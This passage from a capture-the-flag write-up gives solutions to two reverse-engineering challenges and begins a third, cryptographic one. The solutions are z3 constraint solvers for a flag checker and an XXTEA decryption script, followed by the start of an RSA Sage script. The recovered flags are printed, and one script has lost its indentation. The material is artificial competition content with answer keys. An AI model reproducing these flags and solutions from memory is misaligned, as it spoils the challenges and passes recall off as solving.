     * ((0xBF58476D1CE4E5B9LL * (v5 ^ (v5 >> 30))) ^ ((0xBF58476D1CE4E5B9LL * (v5 ^ (v5 >> 30))) >> 27));
  return v3 ^ (v3 >> 31);
}
```

```asm
.rodata:0000000000006085 ; _BYTE byte_6085[5]
.rodata:0000000000006085 byte_6085       db 3, 5, 9, 0Bh, 0Dh    ; DATA XREF: main+26D↑o
.rodata:000000000000608A ; _BYTE byte_608A[7]
.rodata:000000000000608A byte_608A       db 0A5h, 5Ch, 0C3h, 96h, 3Eh, 0D7h, 21h
.rodata:000000000000608A                                         ; DATA XREF: main+2DF↑o
.rodata:000000000000608A _rodata         ends
```

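The input → intermediate state → check pipeline, made explicit:

1. Byte-level obfuscation, producing v59[22]

For each input byte s[i] (i = 0..21):

v56 = ( byte_6085[i%5] * s[i] + 19*i + 79 ) & 0xFF

v55 = ( byte_608A[i%7] ^ v56 ) & 0xFF

v59[i] = ROL8(v55, i%5)

2. Aggregate statistics

• v53: 16-bit sum (mod 2^16)

• v52: byte-wise XOR (8 bits)

• v51: weighted sum Σ( v59[i] * (i+1) ) (mod 2^8)

• v50: Σ popcnt8(v59[i]) (mod 2^8)

3. Pack into 32-bit words and compute one more statistic

• v47 = v59 zero-padded at the end to a multiple of 4 bytes

• Every 4 bytes are packed little-endian into v45[j] (u32)

• v42 = Σ popcnt32(v45[j]) (mod 2^8)

4. Word selection + mixing (all arithmetic wraps at 32 bits)

Let W(k) = v45[k % len(v45)]; then: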

v20 = ROL32(W(0), 5)

v37 = (W(2) - 0x61C88647) ^ v20

v18 = W(4) ^ 0xDEADBEEF

n1727 = (ROL32(W(7),11) + v18 + v37) ^ 0xA5A5A5A5

v16 = 0x85EBCA6B * W(1)

v35 = ROL32(W(5),13) + v16

v15 = W(8) + 2135587861

v13 = (0x27D4EB2D * W(3)) ^ v15 ^ v35

v34 = (ROL32(W(9),17) + v13) ^ 0x5A5AA5A5

v33 = W(3) ^ W(0) ^ 0x13579BDF

v32 = ROL32(W(2),7) + W(1)

for n2 in {0,1}:

v9 = ROL32( ( (0x9E3779B9 ^ n2) - 0x85EBCA6B* v32 ), 5*n2+5 )

v30 = ROL32(v32,11) ^ v32 ^ v9 ^ v33

v33 = v32

v32 = v30

v8 = ROL32(v33,3)

n1911 = (ROL32(v32,11) + v8) ^ 0x5A5AA5A5

5. 64-bit hash (sub_31B0(v59))

v5 = 0x243F6A8885A308D3

for i in [0..len(v59)-1]:

term = v59[i] << (8*(i&7))

v5 = ROL64( 0x9E3779B185EBCA87 * (v5 ^ term), 13 )

z = 0xBF58476D1CE4E5B9 * (v5 ^ (v5>>30))

v3 = 0x94D049BB133111EB * (z ^ (z >>27))

hash64 = v3 ^ (v3>>31)
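The pipeline above can also be written forward in plain Python, which is handy for double-checking a solver's answer without z3. A sketch covering steps 1, 2, 3 and 5; the expected constants are copied from the z3 scripts below, and the word-mixing checks of step 4 are left out, so `check()` passing is necessary but not sufficient. The last three lines of step 5 are the splitmix64 finalizer:

```python
MASK64 = (1 << 64) - 1
BYTE_6085 = [3, 5, 9, 11, 13]
BYTE_608A = [0xA5, 0x5C, 0xC3, 0x96, 0x3E, 0xD7, 0x21]

# Expected values, copied from the z3 scripts below
EXPECTED = {"v42": 0x50, "v50": 0x50, "v51": 0x43, "v52": 0x55, "v53": 0x0913}
HASH_EXPECTED = 0x9B30518C600D26DD


def rol8(x: int, r: int) -> int:
    r &= 7
    return ((x << r) | (x >> (8 - r))) & 0xFF


def rol64(x: int, r: int) -> int:
    r &= 63
    return ((x << r) | (x >> (64 - r))) & MASK64


def popcount(x: int) -> int:
    return bin(x).count("1")


def obfuscate(s: bytes) -> list:
    """Step 1: multiply/add, XOR with byte_608A, rotate left -> v59."""
    out = []
    for i, c in enumerate(s):
        v56 = (BYTE_6085[i % 5] * c + 19 * i + 79) & 0xFF
        out.append(rol8(BYTE_608A[i % 7] ^ v56, i % 5))
    return out


def aggregates(v59: list) -> dict:
    """Steps 2-3: byte statistics, then popcount over little-endian u32 words."""
    padded = v59 + [0] * (-len(v59) % 4)
    words = [int.from_bytes(bytes(padded[k:k + 4]), "little") for k in range(0, len(padded), 4)]
    v52 = 0
    for b in v59:
        v52 ^= b
    return {
        "v53": sum(v59) & 0xFFFF,
        "v52": v52,
        "v51": sum(b * (i + 1) for i, b in enumerate(v59)) & 0xFF,
        "v50": sum(popcount(b) for b in v59) & 0xFF,
        "v42": sum(popcount(w) for w in words) & 0xFF,
    }


def sub_31B0(v59: list) -> int:
    """Step 5: absorb each byte with multiply + rotate, then the splitmix64 finalizer."""
    h = 0x243F6A8885A308D3
    for i, b in enumerate(v59):
        h = rol64((0x9E3779B185EBCA87 * (h ^ (b << (8 * (i & 7))))) & MASK64, 13)
    z = (0xBF58476D1CE4E5B9 * (h ^ (h >> 30))) & MASK64
    v3 = (0x94D049BB133111EB * (z ^ (z >> 27))) & MASK64
    return v3 ^ (v3 >> 31)


def check(candidate: bytes) -> bool:
    """Necessary (not sufficient) check: the step-4 mixing constants are not modeled."""
    v59 = obfuscate(candidate)
    return aggregates(v59) == EXPECTED and sub_31B0(v59) == HASH_EXPECTED
```

If this model matches the binary, `check(b"flag{7ac1d3e59f0b2468}")` should return True for the flag found below.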

FLAG

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from z3 import *

# -------- rodata --------
byte_6085 = [3, 5, 9, 11, 13]
byte_608A = [0xA5, 0x5C, 0xC3, 0x96, 0x3E, 0xD7, 0x21]

# -------- helpers (width-safe) --------
def U8(v): return ZeroExt(24, Extract(7, 0, v))
def U16(v): return ZeroExt(16, Extract(15, 0, v))
def M32(v): return v & BitVecVal(0xFFFFFFFF, 32)
def M8_32(v): return ZeroExt(24, Extract(7, 0, v))
def ROL32(x, r): r %= 32; return M32((x << r) | LShR(x, 32 - r))
def ROR32(x, r): r %= 32; return M32(LShR(x, r) | (x << (32 - r)))

def ROL8_32(x, r):
    r %= 8; x8 = Extract(7, 0, x)
    return ZeroExt(24, Extract(7, 0, (x8 << r) | LShR(x8, 8 - r)))

def ROR8_32(x, r):
    r %= 8; x8 = Extract(7, 0, x)
    return ZeroExt(24, Extract(7, 0, LShR(x8, r) | (x8 << (8 - r))))

def popcnt32(x):
    x = M32(x)
    t = x - (LShR(x, 1) & BitVecVal(0x55555555, 32))
    t = (t & BitVecVal(0x33333333, 32)) + (LShR(t, 2) & BitVecVal(0x33333333, 32))
    t = (t + LShR(t, 4)) & BitVecVal(0x0F0F0F0F, 32)
    t = (t * BitVecVal(0x01010101, 32)) & BitVecVal(0xFFFFFFFF, 32)
    return LShR(t, 24)

def popcnt8(b): return popcnt32(U8(b))

def pack_u32(b0, b1, b2, b3, endian='le'):
    if endian == 'le':
        x = U8(b0) | (U8(b1) << 8) | (U8(b2) << 16) | (U8(b3) << 24)
    else:
        x = U8(b3) | (U8(b2) << 8) | (U8(b1) << 16) | (U8(b0) << 24)
    return M32(x)

def ROL64(x, r): r %= 64; return ((x << r) | LShR(x, 64 - r)) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64)

def sub_31B0_hash64(vbytes):
    v5 = BitVecVal(0x243F6A8885A308D3, 64)
    C = BitVecVal(0x9E3779B185EBCA87, 64)
    for i, bb in enumerate(vbytes):
        lane = ZeroExt(56, Extract(7, 0, bb))
        term = (lane << ((i & 7) * 8)) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64)
        v5 = ROL64((C * (v5 ^ term)) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64), 13)
    z = (BitVecVal(0xBF58476D1CE4E5B9, 64) * (v5 ^ LShR(v5, 30))) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64)
    v3 = (BitVecVal(0x94D049BB133111EB, 64) * (z ^ LShR(z, 27))) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64)
    return (v3 ^ LShR(v3, 31)) & BitVecVal(0xFFFFFFFFFFFFFFFF, 64)

def build_and_diag(endian='le', rot8='rol'):
    print(f"\n=== Trying combination: endian={endian}, sub_2FE0={rot8.upper()}8, sub_3110=ROL32, sub_3160=mod ===")
    s = Solver()
    bs = [BitVec(f"b{i}", 8) for i in range(22)]

    # Input shape
    musts = []
    prefix = b"flag{"
    for i in range(5):
        musts.append(bs[i] == prefix[i])
    musts.append(bs[21] == ord('}'))
    for i in range(5, 21):
        x = bs[i]
        musts.append(Or(And(x >= ord('0'), x <= ord('9')), And(x >= ord('a'), x <= ord('f'))))
    for i in range(22):
        musts.append(bs[i] != 10); musts.append(bs[i] != 13)

    # v59
    v59 = []
    rot8f = ROL8_32 if rot8 == 'rol' else ROR8_32
    for i in range(22):
        a = BitVecVal(byte_6085[i % 5], 32)
        b = BitVecVal(byte_608A[i % 7], 32)
        v56 = M8_32(a * U8(bs[i]) + BitVecVal(19 * i + 79, 32))
        v55 = M8_32(b ^ v56)
        v59.append(rot8f(v55, i % 5))

    # v47/v45
    v47 = list(v59)
    while len(v47) % 4 != 0: v47.append(BitVecVal(0, 32))
    v45 = [pack_u32(v47[i], v47[i + 1], v47[i + 2], v47[i + 3], endian=endian)
           for i in range(0, len(v47), 4)]
    nwords = len(v45)
    getW = lambda idx: v45[idx % nwords]

    # v42
    v42 = BitVecVal(0, 32)
    for w in v45: v42 = M8_32(v42 + M8_32(popcnt32(w)))

    # Aggregate checks
    v53 = v52 = v51 = v50 = BitVecVal(0, 32)
    for i, b in enumerate(v59):
        v53 = ZeroExt(16, Extract(15, 0, U16(v53) + U16(b)))
        v52 = M8_32(v52 ^ U8(b))
        v51 = M8_32(v51 + M8_32(U8(b) * BitVecVal(i + 1, 32)))
        v50 = M8_32(v50 + M8_32(popcnt8(b)))

    # Mixing (ROL32)
    v21 = getW(0); v20 = ROL32(v21, 5)
    v37 = M32(getW(2) - BitVecVal(0x61C88647, 32)) ^ v20
    v18 = getW(4) ^ BitVecVal(0xDEADBEEF, 32)
    v19 = getW(7)
    n1727223967 = (ROL32(v19, 11) + v18 + v37) ^ BitVecVal(0xA5A5A5A5, 32)
    v16 = M32(BitVecVal(0x85EBCA6B, 32) * getW(1))
    v17 = getW(5)
    v35 = ROL32(v17, 13) + v16
    v15 = getW(8) + BitVecVal(2135587861, 32)  # = 0x7F4A7C15
    v13 = M32(BitVecVal(0x27D4EB2D, 32) * getW(3)) ^ v15 ^ v35
    v14 = getW(9)
    v34 = (ROL32(v14, 17) + v13) ^ BitVecVal(0x5A5AA5A5, 32)
    v12 = getW(0)
    v33 = getW(3) ^ v12 ^ BitVecVal(0x13579BDF, 32)
    v11 = getW(1)
    v10 = getW(2)
    v32 = ROL32(v10, 7) + v11
    for n2 in [0, 1]:
        tmp = M32(BitVecVal(0x9E3779B9 ^ n2, 32) - M32(BitVecVal(0x85EBCA6B, 32) * v32))
        v9 = ROL32(tmp, 5 * n2 + 5)
        v30 = ROL32(v32, 11) ^ v32 ^ v9 ^ v33
        v33 = v32
        v32 = v30
    v8 = ROL32(v33, 3)
    n1911915815 = (ROL32(v32, 11) + v8) ^ BitVecVal(0x5A5AA5A5, 32)
    n1611474653 = sub_31B0_hash64(v59)

    # Push all constraints in order and report where solving first fails
    checks = [
        ("shape-prefix", musts),
        ("agg-v42", [v42 == 0x50]),
        ("agg-v50", [v50 == 0x50]),
        ("agg-v51", [v51 == 0x43]),
        ("agg-v52", [v52 == 0x55]),
        ("agg-v53", [v53 == 0x0913]),
        ("mix-n1727", [n1727223967 == BitVecVal(1727223967, 32)]),
        ("mix-v34", [v34 == BitVecVal(0xEF965596, 32)]),
        ("mix-v32v33-eq", [((v32 + v33) ^ BitVecVal(0xA5A5A5A5, 32)) == BitVecVal(0x8A7C3796, 32)]),
        ("mix-n1911", [n1911915815 == BitVecVal(1911915815, 32)]),
        ("hash64-full", [n1611474653 == BitVecVal(0x9B30518C600D26DD, 64),
                         Extract(31, 0, n1611474653) == BitVecVal(0x600D26DD, 32)]),
    ]

    # Advance stage by stage
    tmp = Solver()
    for stage, (name, cs) in enumerate(checks):
        for c in cs: tmp.add(c)
        if tmp.check() != sat:
            print(f"  -> first UNSAT at: {name}")
            # For debugging, show a model from the previous stage (if any)
            prev = Solver()
            ok = True
            for n2, (nm, cl) in enumerate(checks):
                if n2 == stage: break
                for c2 in cl: prev.add(c2)
                if prev.check() != sat:
                    ok = False; break
            if ok and prev.check() == sat:
                m = prev.model()
                try:
                    print("  sample candidate (up to the previous stage):", bytes([m.eval(b).as_long() for b in bs]).decode('ascii', 'ignore'))
                except Exception:
                    pass
            return False

    # Everything passed
    print("  -> all constraints SAT ✅")
    m = tmp.model()
    flag = bytes([m.eval(b).as_long() for b in bs]).decode('ascii', 'ignore')
    print("  FLAG =", flag)
    return True

def main():
    any_ok = False
    for endian in ['le', 'be']:
        for rot8 in ['rol', 'ror']:
            if build_and_diag(endian=endian, rot8=rot8):
                any_ok = True
    if not any_ok:
        print("\n[!] Diagnosis finished: every combination hits UNSAT at some stage. The first UNSAT stage reported above points to the modeling mismatch to fix.")

if __name__ == "__main__":
    main()
```

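Alternatively:

Core computation:

The program computes running checksums and a hash, pads the data and splits it into groups, mixes it over several rounds of rotate-left (ROL), addition/subtraction, XOR, and constants, and compares the results against hard-coded constants; if everything matches, it prints Correct!.

Z3 constraint solving: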

```python
from z3 import *


def r8(x, r):
    return RotateLeft(x, r % 8)


def r32(x, r):
    return RotateLeft(x, r % 32)


def r64(x, r):
    return RotateLeft(x, r % 64)


def pop32(x):
    # Branch-free 32-bit popcount
    a = x - (LShR(x, 1) & BitVecVal(0x55555555, 32))
    b = (a & BitVecVal(0x33333333, 32)) + (LShR(a, 2) & BitVecVal(0x33333333, 32))
    c = (b + LShR(b, 4)) & BitVecVal(0x0F0F0F0F, 32)
    d = c * BitVecVal(0x01010101, 32)
    return LShR(d, 24)


mvals = [0x03, 0x05, 0x09, 0x0B, 0x0D]              # byte_6085
xvals = [0xA5, 0x5C, 0xC3, 0x96, 0x3E, 0xD7, 0x21]  # byte_608A

solver = Solver()
f = [BitVec(f'f{i}', 8) for i in range(22)]
# Shape: flag{ + 16 lowercase hex digits + }
for i, cst in enumerate(b'flag{'):
    solver.add(f[i] == cst)
solver.add(f[21] == ord('}'))
for i in range(5, 21):
    solver.add(Or(And(f[i] >= 0x30, f[i] <= 0x39), And(f[i] >= 0x61, f[i] <= 0x66)))

# Step 1: per-byte obfuscation -> v59 (tb here), zero-padded to 24 bytes
tb = []
for i in range(22):
    tmp = (BitVecVal(mvals[i % 5], 8) * f[i] + BitVecVal((19 * i + 79) & 0xFF, 8))
    tmp = Extract(7, 0, tmp)
    tmp ^= BitVecVal(xvals[i % 7], 8)
    tb.append(r8(tmp, i % 5))
tb += [BitVecVal(0, 8), BitVecVal(0, 8)]

# Step 3: little-endian u32 words and their popcount sum
dw = []
for k in range(0, 24, 4):
    d = ZeroExt(24, tb[k]) | (ZeroExt(24, tb[k + 1]) << 8) | (ZeroExt(24, tb[k + 2]) << 16) | (ZeroExt(24, tb[k + 3]) << 24)
    dw.append(Extract(31, 0, d))
v42 = Extract(7, 0, Sum([pop32(d) for d in dw]))

# Step 2: aggregate statistics
v53, v52, v51, v50 = BitVecVal(0, 16), BitVecVal(0, 8), BitVecVal(0, 8), BitVecVal(0, 8)
for j in range(22):
    v53 = Extract(15, 0, v53 + ZeroExt(8, tb[j]))
    v52 = v52 ^ tb[j]
    v51 = Extract(7, 0, v51 + Extract(7, 0, (tb[j] * BitVecVal(j + 1, 8))))
    v50 = Extract(7, 0, v50 + Extract(7, 0, pop32(ZeroExt(24, tb[j]))))

# Step 4: word selection and mixing
idx = lambda i: dw[i % 6]
v21 = idx(0)
v20 = r32(v21, 5)
v37 = (idx(2) - BitVecVal(1640531527, 32)) ^ v20
v18 = idx(4) ^ BitVecVal(0xDEADBEEF, 32)
v19 = idx(7)
n172 = (r32(v19, 11) + v18 + v37) ^ BitVecVal(0xA5A5A5A5, 32)
v16 = (BitVecVal(0xFFFFFFFF & (-2048144789), 32) * idx(1))
v17 = idx(5)
v35 = r32(v17, 13) + v16
v15 = idx(8) + BitVecVal(2135587861, 32)
v13 = (BitVecVal(668265261, 32) * idx(3)) ^ v15 ^ v35
v14 = idx(9)
v34 = (r32(v14, 17) + v13) ^ BitVecVal(0x5A5AA5A5, 32)
v12 = idx(0)
v33 = idx(3) ^ v12 ^ BitVecVal(0x13579BDF, 32)
v11 = idx(1)
v10 = idx(2)
v32 = r32(v10, 7) + v11
for m in range(2):
    v9 = r32((BitVecVal(m, 32) ^ BitVecVal(0x9E3779B9, 32)) - (BitVecVal(2048144789, 32) * v32), 5 * m + 5)
    v30 = r32(v32, 11) ^ v32 ^ v9 ^ v33
    v33 = v32
    v32 = v30
v8 = r32(v33, 3)
n191 = (r32(v32, 11) + v8) ^ BitVecVal(0x5A5AA5A5, 32)

# Step 5: 64-bit hash (sub_31B0)
h64 = BitVecVal(0x243F6A8885A308D3, 64)
for i in range(22):
    sh = 8 * (i & 7)
    mixed = h64 ^ (ZeroExt(56, tb[i]) << sh)
    h64 = r64(BitVecVal(0x9E3779B185EBCA87, 64) * mixed, 13)
tmp = BitVecVal(0xBF58476D1CE4E5B9, 64) * (h64 ^ LShR(h64, 30))
v3 = BitVecVal(0x94D049BB133111EB, 64) * (tmp ^ LShR(tmp, 27))
n161 = v3 ^ LShR(v3, 31)

# Compare against the hard-coded constants
solver.add(n161 == BitVecVal(0x9B30518C600D26DD, 64))
solver.add(Extract(31, 0, n161) == BitVecVal(1611474653, 32))
solver.add(n191 == BitVecVal(1911915815, 32))
solver.add(((v32 + v33) ^ BitVecVal(0xA5A5A5A5, 32)) == BitVecVal(2323396502, 32))
solver.add(v34 == BitVecVal(4019606934, 32))
solver.add(n172 == BitVecVal(1727223967, 32))
solver.add(v42 == BitVecVal(0x50, 8))
solver.add(v50 == BitVecVal(0x50, 8))
solver.add(v51 == BitVecVal(0x43, 8))
solver.add(v52 == BitVecVal(0x55, 8))
solver.add(v53 == BitVecVal(0x0913, 16))

# solve
if solver.check() == sat:
    model = solver.model()
    flag = ''.join(chr(model[f[i]].as_long()) for i in range(22))
    print("done:", flag)
else:
    print("nonooonono")
```



#flag{7ac1d3e59f0b2468}

Dragon

题目考点

• XXTEA 加密算法

• 位运算操作

• 密钥派生

解题思路



用ida打开



先对预设的加密数据(32 位整数数组),使用原始密钥和派生密钥(基于原始密钥计算得出)分别执行解密

接着将解密后的整数数组转换为字节数据,保存到两个文件(默认candidate_raw.bin和candidate_der.bin)

同时尝试以 ASCII 形式显示解密结果,方便查看内容

根据思路脚本

```python
#!/usr/bin/env python3
import struct
import argparse
from typing import List


def circular_left_shift_32(value: int, shift_amount: int) -> int:
    """
    Rotate a 32-bit unsigned integer left by shift_amount bits.
    """
    value = value & 0xFFFFFFFF
    return ((value << shift_amount) | (value >> (32 - shift_amount))) & 0xFFFFFFFF


def mixing_function(y_val: int, z_val: int, s_val: int, key_list: List[int],
                    position: int, e_val: int) -> int:
    """
    Core XXTEA mixing function, kept consistent with the implementation in obf_jmp_0.
    """
    temp1 = ((z_val << 4) ^ (y_val >> 5))
    temp2 = ((y_val << 4) ^ (z_val >> 5))
    combined_temp = (temp1 + temp2) & 0xFFFFFFFF
    index_val = ((position & 3) ^ e_val) & 3
    key_element = key_list[index_val]
    u_component = ((s_val ^ y_val) + (key_element ^ z_val)) & 0xFFFFFFFF
    return (combined_temp ^ u_component) & 0xFFFFFFFF


def custom_xxtea_decrypt(
    encrypted_data: List[int],
    decryption_key: List[int],
    iteration_count: int = 0x2A,
    delta_value: int = 0x87654321
) -> List[int]:
    """
    Apply the customized XXTEA decryption to an integer array and return the decrypted array.
    iteration_count: number of rounds, 0x2A by default; delta_value: constant subtracted from the sum each round.
    """
    data_length = len(encrypted_data)
    if data_length < 2:
        return encrypted_data.copy()
    decrypted_result = encrypted_data.copy()
    accumulator = (iteration_count * delta_value) & 0xFFFFFFFF
    for _ in range(iteration_count):
        e_component = (accumulator >> 2) & 3
        for current_pos in range(data_length - 1, -1, -1):
            y_element = decrypted_result[(current_pos + 1) % data_length]
            z_element = decrypted_result[(current_pos - 1) % data_length]
            mixed_value = mixing_function(
                y_element, z_element, accumulator,
                decryption_key, current_pos, e_component
            )
            decrypted_result[current_pos] = (
                decrypted_result[current_pos] - mixed_value
            ) & 0xFFFFFFFF
        accumulator = (accumulator - delta_value) & 0xFFFFFFFF
    return decrypted_result


def convert_words_to_bytearray(word_list: List[int]) -> bytes:
    """
    Pack 32-bit unsigned words into a little-endian byte string and strip trailing zero bytes.
    """
    byte_data = b"".join(struct.pack("<I", word) for word in word_list)
    return byte_data.rstrip(b"\x00")


def execute_main():
    argument_parser = argparse.ArgumentParser(
        description="Custom XXTEA decryption tool; writes candidate_raw.bin and candidate_der.bin"
    )
    argument_parser.add_argument(
        "--output-raw",
        default="candidate_raw.bin",
        help="output file for the data decrypted with the original key"
    )
    argument_parser.add_argument(
        "--output-derived",
        default="candidate_der.bin",
        help="output file for the data decrypted with the derived key"
    )
    parsed_args = argument_parser.parse_args()

    # Ciphertext (array of 32-bit words)
    encrypted_words = [
        0x0EB4D6CE, 0x521DDE8B, 0x21ED24FD, 0xBA10EC26,
        0x3339931C, 0x46DC0E7D, 0xCC469F44, 0x64BA7079,
        0x64777977, 0xB2151C98, 0xDBCC5AA1
    ]

    # Original key and derived key
    original_key = [0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210]
    derived_key = [circular_left_shift_32(x ^ 0x13579BDF, 7) for x in original_key]

    # Decrypt with both keys
    decrypted_original = custom_xxtea_decrypt(encrypted_words, original_key)
    decrypted_derived = custom_xxtea_decrypt(encrypted_words, derived_key)

    # Convert to bytes
    original_bytes = convert_words_to_bytearray(decrypted_original)
    derived_bytes = convert_words_to_bytearray(decrypted_derived)

    # Write the output files
    with open(parsed_args.output_raw, "wb") as output_file:
        output_file.write(original_bytes)
    with open(parsed_args.output_derived, "wb") as output_file:
        output_file.write(derived_bytes)

    # Show the results
    print(f"Original-key plaintext written to: '{parsed_args.output_raw}'")
    print(f"Derived-key plaintext written to: '{parsed_args.output_derived}'")
    try:
        print("Original-key plaintext as ASCII:", original_bytes.decode("utf-8", errors="replace"))
        print("Derived-key plaintext as ASCII:", derived_bytes.decode("utf-8", errors="replace"))
    except UnicodeDecodeError:
        print("Some of the data is not valid UTF-8 and cannot be fully displayed")


if __name__ == "__main__":
    execute_main()
```

Run the script.

Alternatively:

#!/usr/bin/env python3

import struct

import argparse

from typing import List

def rol32(x: int, r: int) -> int:

"""

对 32 位整数 x 左循环移位 r 位。

"""

x &= 0xFFFFFFFF

return ((x << r) | (x >> (32 - r))) & 0xFFFFFFFF

def mx(y: int, z: int, s: int, k: List[int], p: int, e: int) -> int:

"""

XXTEA 核心混合函数,与 obf_jmp_0 中的实现保持一致。

"""

t = ((z << 4) ^ (y >> 5)) + ((y << 4) ^ (z >> 5))

t &= 0xFFFFFFFF

idx = ((p & 3) ^ e) & 3

u = ((s ^ y) + (k[idx] ^ z)) & 0xFFFFFFFF

return (t ^ u) & 0xFFFFFFFF

def xxtea_decrypt(

v: List[int], k: List[int], rounds: int = 0x2A, delta: int = 0x87654321

) -> List[int]:

"""

对整数列表 v 应用定制的 XXTEA 解密算法,返回解密后的整数列表。

rounds: 轮数,默认为 0x2A;delta:累减常量。

"""

n = len(v)

if n < 2:

return v.copy()

v = v.copy()

s = (rounds * delta) & 0xFFFFFFFF

while rounds > 0:

e = (s >> 2) & 3

# p 从 n-1 倒序到 0

for p in range(n - 1, -1, -1):

y = v[(p + 1) % n]

z = v[(p - 1) % n]

v[p] = (v[p] - mx(y, z, s, k, p, e)) & 0xFFFFFFFF

s = (s - delta) & 0xFFFFFFFF

rounds -= 1

return v

def words_to_bytes(words: List[int]) -> bytes:

"""

将 32 位整数字列表打包成小端字节串,并去除尾部多余的 0x00。

"""

data = b"".join(struct.pack("<I", w) for w in words)

return data.rstrip(b"\x00")

def main():
    parser = argparse.ArgumentParser(
        description="Custom XXTEA decryption script; writes candidate_raw.bin and candidate_der.bin"
    )
    parser.add_argument(
        "--out-raw", default="candidate_raw.bin",
        help="output file for the plaintext decrypted with the raw key",
    )
    parser.add_argument(
        "--out-der", default="candidate_der.bin",
        help="output file for the plaintext decrypted with the derived key",
    )
    args = parser.parse_args()

    # Known ciphertext (32-bit words)
    cipher_words = [
        0x0EB4D6CE, 0x521DDE8B, 0x21ED24FD, 0xBA10EC26,
        0x3339931C, 0x46DC0E7D, 0xCC469F44, 0x64BA7079,
        0x64777977, 0xB2151C98, 0xDBCC5AA1,
    ]

    # Raw key and the key derived from it
    K_raw = [0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210]
    K_derived = [rol32(x ^ 0x13579BDF, 7) for x in K_raw]

    # Decrypt with both candidate keys
    plain_raw = xxtea_decrypt(cipher_words, K_raw)
    plain_der = xxtea_decrypt(cipher_words, K_derived)

    # Convert to bytes and write the output files
    data_raw = words_to_bytes(plain_raw)
    data_der = words_to_bytes(plain_der)
    with open(args.out_raw, "wb") as f:
        f.write(data_raw)
    with open(args.out_der, "wb") as f:
        f.write(data_der)

    # Print the results; errors="replace" never raises, so no try/except is needed
    print(f"Written raw plaintext to '{args.out_raw}'")
    print(f"Written derived plaintext to '{args.out_der}'")
    print("RAW ASCII:", data_raw.decode("utf-8", errors="replace"))
    print("DER ASCII:", data_der.decode("utf-8", errors="replace"))


if __name__ == "__main__":
    main()
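A quick way to gain confidence in `xxtea_decrypt` is to pair it with the forward direction and check a round trip. The sketch below is hypothetical: `xxtea_encrypt` is not taken from the binary. It assumes the encryptor uses the standard XXTEA sweep (p from 0 to n-1, running sum increased by `delta` before each round) combined with the custom `mx` above; if the binary differs, only the decryptor recovered from `obf_jmp_0` should be trusted.

```python
from typing import List

MASK = 0xFFFFFFFF


def mx(y: int, z: int, s: int, k: List[int], p: int, e: int) -> int:
    # Same custom mixing function as in the solver above
    t = (((z << 4) ^ (y >> 5)) + ((y << 4) ^ (z >> 5))) & MASK
    u = ((s ^ y) + (k[((p & 3) ^ e) & 3] ^ z)) & MASK
    return (t ^ u) & MASK


def xxtea_encrypt(v: List[int], k: List[int], rounds: int = 0x2A, delta: int = 0x87654321) -> List[int]:
    # Hypothetical forward direction: sweep p upward and ADD mx each step
    n = len(v)
    v = v.copy()
    if n < 2:
        return v
    s = 0
    for _ in range(rounds):
        s = (s + delta) & MASK
        e = (s >> 2) & 3
        for p in range(n):
            y = v[(p + 1) % n]  # not yet updated this round (except v[0] when p = n-1)
            z = v[(p - 1) % n]  # already updated this round (except v[n-1] when p = 0)
            v[p] = (v[p] + mx(y, z, s, k, p, e)) & MASK
    return v


def xxtea_decrypt(v: List[int], k: List[int], rounds: int = 0x2A, delta: int = 0x87654321) -> List[int]:
    # Mirror image: start from the final sum, sweep p downward and SUBTRACT mx
    n = len(v)
    v = v.copy()
    if n < 2:
        return v
    s = (rounds * delta) & MASK
    for _ in range(rounds):
        e = (s >> 2) & 3
        for p in range(n - 1, -1, -1):
            y = v[(p + 1) % n]
            z = v[(p - 1) % n]
            v[p] = (v[p] - mx(y, z, s, k, p, e)) & MASK
        s = (s - delta) & MASK
    return v


if __name__ == "__main__":
    key = [0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210]
    plain = [0x64636261, 0x68676665, 0x00006A69]
    ct = xxtea_encrypt(plain, key)
    assert xxtea_decrypt(ct, key) == plain
    print("round trip ok")
```

Because each step of the decryptor sees exactly the same `y`, `z`, `s` and `e` that the matching encryption step saw, subtracting `mx` undoes the addition word by word.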

FLAG

flag{cbee3251-9cff-4542-bf15-337bb8df7f3f}

Crypto

RSA.iso

Challenge topics

• RSA

• Sage

Solution approach
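The key observation behind step 4 of the script is that any two points with distinct x-coordinates determine a unique short Weierstrass curve y^2 = x^3 + a·x + b: each point gives one linear equation in a and b. The sketch below does the same computation over a small prime field GF(p) instead of F_{p^2} so that it runs in plain Python; `recover_curve` and `on_curve` are illustrative helper names, and the script itself solves this system with Sage's `Matrix.solve_right`.

```python
from typing import Tuple

Point = Tuple[int, int]


def recover_curve(P1: Point, P2: Point, p: int) -> Tuple[int, int]:
    """Return (a, b) such that both points lie on y^2 = x^3 + a*x + b over GF(p)."""
    (x1, y1), (x2, y2) = P1, P2
    dx = (x1 - x2) % p
    if dx == 0:
        raise ValueError("need two points with distinct x-coordinates")
    r1 = (y1 * y1 - x1 ** 3) % p  # equals a*x1 + b
    r2 = (y2 * y2 - x2 ** 3) % p  # equals a*x2 + b
    a = (r1 - r2) * pow(dx, -1, p) % p  # subtract the two equations
    b = (r1 - a * x1) % p
    return a, b


def on_curve(P: Point, a: int, b: int, p: int) -> bool:
    x, y = P
    return (y * y - (x ** 3 + a * x + b)) % p == 0


if __name__ == "__main__":
    p = 10007  # small prime, for illustration only
    P1, P2 = (5, 123), (42, 999)
    a, b = recover_curve(P1, P2, p)
    print(a, b, on_curve(P1, a, b, p), on_curve(P2, a, b, p))
```

`pow(dx, -1, p)` (modular inverse) needs Python 3.8 or newer.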

solve.sage

from sage.all import *

import os, re

# ===== Helper functions =====

def to_bytes(n: int) -> bytes:
    n = int(n)
    if n == 0:
        return b"\x00"
    return n.to_bytes((n.bit_length() + 7) // 8, "big")

def generate_prime_component(a_val, r_val):
    return (Integer(2)**a_val) * r_val * lcm(range(1, 256)) - 1

def sanitize_and_pull_vars(text, F, i):
    """
    Extract P, Q, gift, n, c, e from the text of task.sage / output.txt as robustly as possible.

    Rules:
    - drop lines with preparser-only syntax such as 'F.<', 'K.<', 'load('
    - drop comment lines
    - replace '^' with '**' (Python exponentiation)
    - keep only the assignments we care about (multi-line lists/tuples allowed)

    Parse order: gift -> P -> Q -> n -> c -> e
    """
